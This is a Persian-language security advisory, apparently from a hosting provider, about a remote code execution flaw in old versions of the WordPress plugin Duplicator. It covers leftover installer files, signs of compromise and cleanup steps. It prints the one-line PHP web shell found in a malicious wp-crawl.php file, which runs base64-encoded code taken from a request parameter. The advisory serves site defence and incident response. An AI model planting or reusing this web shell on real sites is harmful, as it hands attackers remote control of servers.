یکی از افزونه های پرکاربرد وردپرس به ویژه در فرایند انتقال یا نصب قالب با بسته نصبی، افزونه ی محبوب Duplicator است. اما متأسفانه نسخه های قدیمی این افزونه (تا نسخه 1.2.42) دارای یک حفره امنیتی بسیار خطرناک از نوع اجرای کد از راه دور (Remote Code Execution) هستند.در این مقاله از مرکز آموزش الماس هاست، به صورت کامل بررسی می کنیم که چگونه این آسیب پذیری رخ می دهد، علائم هک شدن چیست و چه اقداماتی برای پاک سازی سایت و جلوگیری از نفوذ مجدد باید انجام دهید.
خطر از کجا شروع می شود؟
نصب افزونه Duplicator به تنهایی مشکلی ایجاد نمی کند، اما مشکل از زمانی آغاز می شود که کاربران پس از ساخت بسته نصبی، فایل های باقی مانده ی آن را از روی هاست حذف نمی کنند. این بی توجهی ساده می تواند دروازه ای برای هکرها باز کند تا به راحتی فایل های کلیدی سایت شما از جمله wp-config.php
را دستکاری یا پاک کنند.
فایل های خطرناک باقی مانده پس از نصب بسته نصبی
پس از نصب قالب یا انتقال سایت با بسته نصبی Duplicator، فایل ها و پوشه هایی مانند موارد زیر در هاست باقی می مانند:
installer.php
installer-log.txt
installer-data.sql
installer-backup.php
database.sql
- فایل زیپ بسته نصبی (مثلاً
site_2024_package.zip
) - پوشه ی
wp-snapshots
اگر این فایل ها را حذف نکنید، یک هکر می تواند با اجرای مجدد فایل installer.php
، کل سایت شما را ریست کرده یا حتی کدهای مخرب تزریق کند.
فایل wp-crawl.php؛ نشانه واضح هک شدن
در بسیاری از مواردی که سایت ها به دلیل این آسیب پذیری هک شده اند، فایلی مشکوک با نام wp-crawl.php
در ریشه هاست (public_html) مشاهده شده است. این فایل یک اسکریپت مخرب است که امکان اجرای کد از راه دور را به هکر می دهد.
نمونه ای از کد داخل این فایل به شکل زیر است:
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');
اگر چنین فایلی را در هاست خود مشاهده کردید، بلافاصله آن را حذف کنید.
راهنمای پاک سازی سایت وردپرسی پس از استفاده از Duplicator
در صورتی که از این افزونه استفاده کرده اید و اکنون نگران امنیت سایت خود هستید، مراحل زیر را در اولویت قرار دهید:
حذف فایل های باقی مانده ی بسته نصبی
از طریق فایل منیجر یا FTP، موارد زیر را از هاست خود حذف کنید:
حذف فایل مخرب wp-crawl.php (در صورت وجود)
اگر چنین فایلی در ریشه هاست شما وجود دارد، آن را بلافاصله حذف کنید.
به روزرسانی یا حذف افزونه Duplicator
- در صورتی که هنوز از افزونه Duplicator استفاده می کنید، آن را به آخرین نسخه رسمی بروزرسانی کنید.
- در غیر این صورت می توانید افزونه را غیرفعال یا کاملاً حذف نمایید.
بازگردانی سایت به وضعیت پایدار (در صورت ریست شدن wp-config.php)
اگر سایت از دسترس خارج شده و فایل wp-config.php
آسیب دیده:
- جدیدترین نسخه وردپرس را از wordpress.org دریافت کنید.
- فایل خام
wp-config-sample.php
را از آن استخراج کرده و با نامwp-config.php
در هاست خود آپلود کنید. - اطلاعات دیتابیس (نام پایگاه داده، نام کاربری، رمز عبور و هاست) را در آن وارد نمایید.
توصیه های امنیتی الماس هاست برای کاربران وردپرس
- بلافاصله پس از نصب قالب یا انتقال سایت با Duplicator، فایل های نصبی را حذف کنید.
- از هاست های مجهز به آنتی ویروس و مانیتورینگ دائمی استفاده کنید (سرویس های میزبانی وردپرس در الماس هاست به این ابزارها مجهز هستند).
- همیشه از افزونه ها و قالب های معتبر و نسخه های رسمی استفاده نمایید.
- تهیه نسخه پشتیبان منظم را فراموش نکنید. پیشنهاد ما استفاده از افزونه هایی مانند UpdraftPlus یا ابزارهای بکاپ داخلی پنل های الماس هاست است.
- برای هر سایت وردپرس، یک حساب کاربری FTP و دیتابیس مجزا تعریف کنید.
جمع بندی
آسیب پذیری Duplicator به ما یادآوری می کند که کوچک ترین بی احتیاطی در وردپرس می تواند باعث هک گسترده شود. اگر از این افزونه برای نصب قالب یا انتقال سایت استفاده کرده اید، همین حالا بررسی کنید که فایل های باقی مانده را پاک کرده اید یا نه. ما در الماس هاست به کاربران خود توصیه می کنیم که پس از اتمام نصب بسته نصبی، یک اسکن امنیتی کامل انجام داده و سایت را در لیست مانیتورینگ لحظه ای امنیتی قرار دهند. برای مشاوره بیشتر، تیم پشتیبانی ما آماده کمک رسانی به شماست.